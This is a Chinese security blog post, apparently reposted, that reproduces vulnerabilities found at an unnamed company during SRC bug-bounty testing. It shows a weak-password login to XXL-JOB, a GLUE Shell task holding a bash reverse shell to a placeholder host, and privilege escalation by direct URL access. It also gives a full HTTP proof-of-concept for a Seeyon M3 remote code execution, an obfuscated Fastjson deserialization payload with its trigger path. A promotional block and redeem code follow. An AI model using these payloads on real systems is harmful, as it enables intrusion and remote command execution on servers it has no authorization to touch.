文章总结： 文档记录某企业SRC漏洞复现过程，涵盖XXL-JOB后台任意命令执行与垂直越权漏洞、致远M3系统RCE漏洞的完整利用链。通过弱口令登录、GLUE模式任务注入Shell命令、直接访问权限接口实现越权，并给出具体POC载荷和反序列化触发路径。文末推广无问AI安全社区并附积分兑换码。 综合评分： 68 文章分类： 漏洞分析,WEB安全,红队,实战经验,渗透测试

[SRC]某企业的漏洞复现

略懂安全的三秋 略懂安全的三秋

略懂安全的三秋

2026年5月1日 17:05 广西

在小说阅读器读本章

去阅读

这里通过目录扫描扫出了一个登录框

这里查了一下有历史漏洞，所以我就复现一下，前提是能登录后台

很幸运通过admin 123456登录成功

XXL-JOB 后台任意命令执行

新增一个 GLUE 模式任务

运行模式 GLUE(Shell)

点击 GLUE IDE，编辑脚本：

编辑脚本反弹 shell：

!/bin/bash

bash -i >& /dev/tcp/your-ip/8888 0>&1

XXL-JOB 垂直越权漏洞

以普通用户 user 身份重新登录：

普通用户与管理员用户导航栏：

• 管理员用户 admin：运行报表、任务管理、调度日志、执行器管理、用户管理、使用教程
• 普通用户 user：运行报表、任务管理、调度日志、使用教程

以普通用户 user 身份直接访问 http://your-ip:8080/xxl-job-admin/jobgroup，即可获取执行器管理权限：

来到另一给系统

这个系统也复现一下

致远M3 RCE漏洞

POC：

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate Connection: close

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none Sec-Fetch-User: ?1

Content-Type: application/json

Content-Length: 3680

 [{“userMessageId”:”{\”@\u0074\u0079\u0070\u0065\”:\”\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\”,\”\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\”:\”\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:HEX;\”}|”,”channelId”:”111″,”title”:”111″,”content”:”222″,”deviceType”:”androidphone”,”serviceProvider”:”baidu”,”deviceFirm”:”other”}

再读取接口日志内容触发 Fastjson 反序列化/mobile_portal/api/systemLog/pns/loadLog/app.log

无问AI已攻克无数网络安全技术难题，达到人类顶级能力的网安大模型，让你的技术研究效率实现跃升。

无问社区累计解决网安技术问题4,000,000+，140,000+

无问AI远超通用大模型，在网络安全问题理解、代码生成、安全研究分析及其他复杂场景上是你的最佳选择。

链接：https://www.wwlib.cn/index.php/

如果积分不够用可以使用我的积分码，即可领取100积分

兑换链接：https://www.wwlib.cn/index.php/gift

WUWEN_OE9fxEYaPHQqivSWXb

由于传播、利用本公众号所提供的信息而造成``的任何直接或者间接的后果及损失，均由使用``者本人负责，公众号略懂安全的三秋不``为此承担任何责任，一旦造成后果请自行承担！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：略懂安全的三秋 略懂安全的三秋 略懂安全的三秋《[SRC]某企业的漏洞复现》